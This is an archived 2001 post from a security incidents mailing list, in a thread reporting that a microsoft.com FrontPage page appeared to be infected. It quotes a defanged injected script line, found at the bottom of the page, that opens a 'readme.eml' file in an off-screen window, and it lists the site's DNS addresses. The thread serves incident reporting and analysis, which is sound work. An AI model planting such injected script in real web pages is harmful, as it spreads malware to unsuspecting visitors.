RE: Please tell me I'm wrong: microsoft.com infected

From: Ken Pfeil (Kenat_private)
Date: Wed Sep 19 2001 - 15:27:51 PDT

Next message: Rodrigo Goya: "Re: Please tell me I'm wrong: microsoft.com infected"

Previous message: jmillerat_private: "RE: Please tell me I'm wrong: microsoft.com infected"
Next in thread: jmillerat_private: "RE: Please tell me I'm wrong: microsoft.com infected"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Must have been 207.46.230.218 'cause it's offline now.

> -----Original Message-----
> From: Ken Pfeil [mailto:Kenat_private]
> Sent: Wednesday, September 19, 2001 6:26 PM
> To: Michael H. Warfield; Steve Cody
> Cc: incidentsat_private
> Subject: RE: Please tell me I'm wrong: microsoft.com infected
>
>
> Which system?
>
> Canonical name: www.microsoft.akadns.net
> Aliases:
>   www.microsoft.com
> Addresses:
>   207.46.230.218
>   207.46.197.102
>   207.46.197.100
>   207.46.230.220
>
> > -----Original Message-----
> > From: Michael H. Warfield [mailto:mhwat_private]
> > Sent: Wednesday, September 19, 2001 5:54 PM
> > To: Steve Cody
> > Cc: incidentsat_private
> > Subject: Re: Please tell me I'm wrong: microsoft.com infected
> >
> >
> > On Wed, Sep 19, 2001 at 03:37:39PM -0400, Steve Cody wrote:
> > > I just went to http://www.microsoft.com/frontpage, and my Symantec
> > > Norton Antivirus popped up and denied access to readme.eml.
> >
> > > I could not view the source of the loaded page, so I can't verify that
> > > it is definitely infected.
> >
> > 	Yes, indeedie do.  Just did a wget
> > http://www.microsoft.com/frontpage
> > and here is what's on da bottom:
> >
> > [html][script language="JavaScript"]window.open("readme.eml",
> > null, "resizable=no,top=6000,left=6000")[/script][/html]
> >
> > 	Defanged by turning angle brackets into square brackets even though
> > it's not in an html attachment.  ;-)
> >
> > > Steve
> > >
> > >
> > >
> > ------------------------------------------------------------------
> > ----------
> > > This list is provided by the SecurityFocus ARIS analyzer service.
> > > For more information on this free incident handling, management
> > > and tracking system please see: http://aris.securityfocus.com
> >
> > --
> >  Michael H. Warfield    |  (770) 985-6132   |  mhwat_private
> >   (The Mad Wizard)      |  (678) 463-0932   |
> http://www.wittsend.com/mhw/
>   NIC whois:  MHW9      |  An optimist believes we live in the best of all
>  PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!
>
>
> ------------------------------------------------------------------
> ----------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Rodrigo Goya: "Re: Please tell me I'm wrong: microsoft.com infected"
Previous message: jmillerat_private: "RE: Please tell me I'm wrong: microsoft.com infected"
Next in thread: jmillerat_private: "RE: Please tell me I'm wrong: microsoft.com infected"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 15:37:54 PDT